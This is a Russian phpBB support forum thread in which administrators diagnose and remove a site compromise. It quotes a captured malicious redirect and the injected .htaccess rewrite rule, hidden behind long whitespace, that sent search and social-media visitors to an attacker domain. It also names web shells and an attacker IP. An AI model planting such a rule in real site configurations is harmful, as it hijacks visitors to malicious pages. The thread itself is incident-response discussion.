Как убить Трояна?

AdmninsCluba · Сообщение **AdmninsCluba** » 12.05.2007 16:23

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

MIT · Сообщение **MIT** » 08.06.2012 19:23

zeroed, вот твой вирус:

Код: Выделить всё

GET http://ubuntologia.ru/forum/styles/prosilver/template/forum_fn.js HTTP/1.1
Host: ubuntologia.ru
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Accept: */*
Referer: http://ubuntologia.ru/forum/search.php?search_id=active_topics
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: phpbb3_ubun_k=; phpbb3_ubun_sid=bd96ddcb426aac983d5f97f6a2144e48; phpbb3_ubun_u=1
Connection: keep-alive
Connection: keep-alive

Код: Выделить всё

HTTP/1.1 301 Moved Permanently
Date: Fri, 08 Jun 2012 15:22:07 GMT
Server: Apache/2.2.14 (Ubuntu)
Location: http://gagapgeg.ru/haiaig?8
Vary: Accept-Encoding
Content-Length: 315
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://****.ru/haiaig?8">here</a>.</p>
<hr>
<address>Apache/2.2.14 (Ubuntu) Server at ubuntologia.ru Port 80</address>
</body></html>

zeroed · Сообщение **zeroed** » 08.06.2012 19:32

Сравнил с помощью WinMerge forum_fn.js и не нашел никакой разницы с исходным файлом из свежескачанного архива с установкой форума.

HAMMER663 · Сообщение **HAMMER663** » 08.06.2012 19:36

Видимо кто-то хранит шаблоны в базе данных

MIT · Сообщение **MIT** » 08.06.2012 19:42

Видимо кто-то подправил файл .htaccess...

zeroed · Сообщение **zeroed** » 08.06.2012 20:29

MIT,

Спасибо.

Выпилил.

Интересно, стоит где-то еще или нет что-нибудь еще..

Добавлено спустя 1 минуту 54 секунды:
Что было:

В файле .htaccess было вставлено следующее:

Код: Выделить всё

                                                <IfModule mod_rewrite.c>
                                                RewriteEngine On
                                                RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|aol|goto|infoseek|lycos|search|bing|dogpile|facebook|twitter|live|myspace|linkedin|flickr)\.(.*)
                                                RewriteRule ^(.*)$ http://gagapgeg.ru/haiaig?8 [R=301,L]
                                                </IfModule>

причем вставили так, что не было видно, добавили кучу пробелов. нашел в двух местах.

МайскийЖук · 08.06.2012 21:15

Зашел. Нажал на любую тему. Никаких вирусов не обнаружил.

zeroed · Сообщение **zeroed** » 08.06.2012 21:26

МайскийЖук писал(а):Зашел. Нажал на любую тему. Никаких вирусов не обнаружил.

Ну так я его выпилил. Отлично значит :) Всем спасибо. Буду сейчас просматривать бэкапы и смотреть, когда он появился. Может по логам пойму, что произошло.

Добавлено спустя 38 минут 7 секунд:
Только что вернулись все файлы назад..

FTP я отключил, пароли сменил..

Откуда еще могут заходить? Где можно посмотреть логи, кто добавил этот файл?

MIT · Сообщение **MIT** » 08.06.2012 22:13

zeroed писал(а):Откуда еще могут заходить?

Веб-шелл, ищи подозрительные файлы php.

zeroed писал(а):Где можно посмотреть логи, кто добавил этот файл?

access_log, ищи частые запросы к неизвестным файлам методом POST.

zeroed · Сообщение **zeroed** » 08.06.2012 22:21

Пока я их ищу и удаляю, он создает новые..

Можно как-то скопом все это предотвратить кроме отключения сервака?

MIT · Сообщение **MIT** » 08.06.2012 22:28

zeroed, можешь на время анализа логов отключить веб-сервер, изучить и удалить подозрительные файлы (скачав их себе на всякий случай), а также проверить странные запросы к файлам движка (длинные GET-запросы, POST-запросы к файлам, которые не должны оные обрабатывать, запросы с того же IP, с которого были запросы к подозрительным файлам и т.п.).

zeroed · Сообщение **zeroed** » 08.06.2012 22:31

спасибо, ip нашел и забанил его в системе, сижу ищу файлы

POST к udp это нормально?

MIT · Сообщение **MIT** » 08.06.2012 22:34

zeroed, вряд ли. Проверяй всё, что кажется подозрительным.

Пчелкин · Сообщение **Пчелкин** » 09.06.2012 9:27

zeroed Ип можно увидеть?

zeroed · Сообщение **zeroed** » 09.06.2012 19:38

85.192.44.130

angst66 · Сообщение **angst66** » 26.07.2012 15:15

Со вчерашнего дня аваст блокирует мой сайт. Другие антивири молчат, я не вижу признаков заражения. Не находят ничего онлай сканнеры. Я написал в поддержку аваста по поводу ложного заражения. Но все таки. Может быть я чего то не вижу. Уважаемые гуру, заражен ли мой форум?

phpBB Guru - Официальная русская поддержка форума phpBB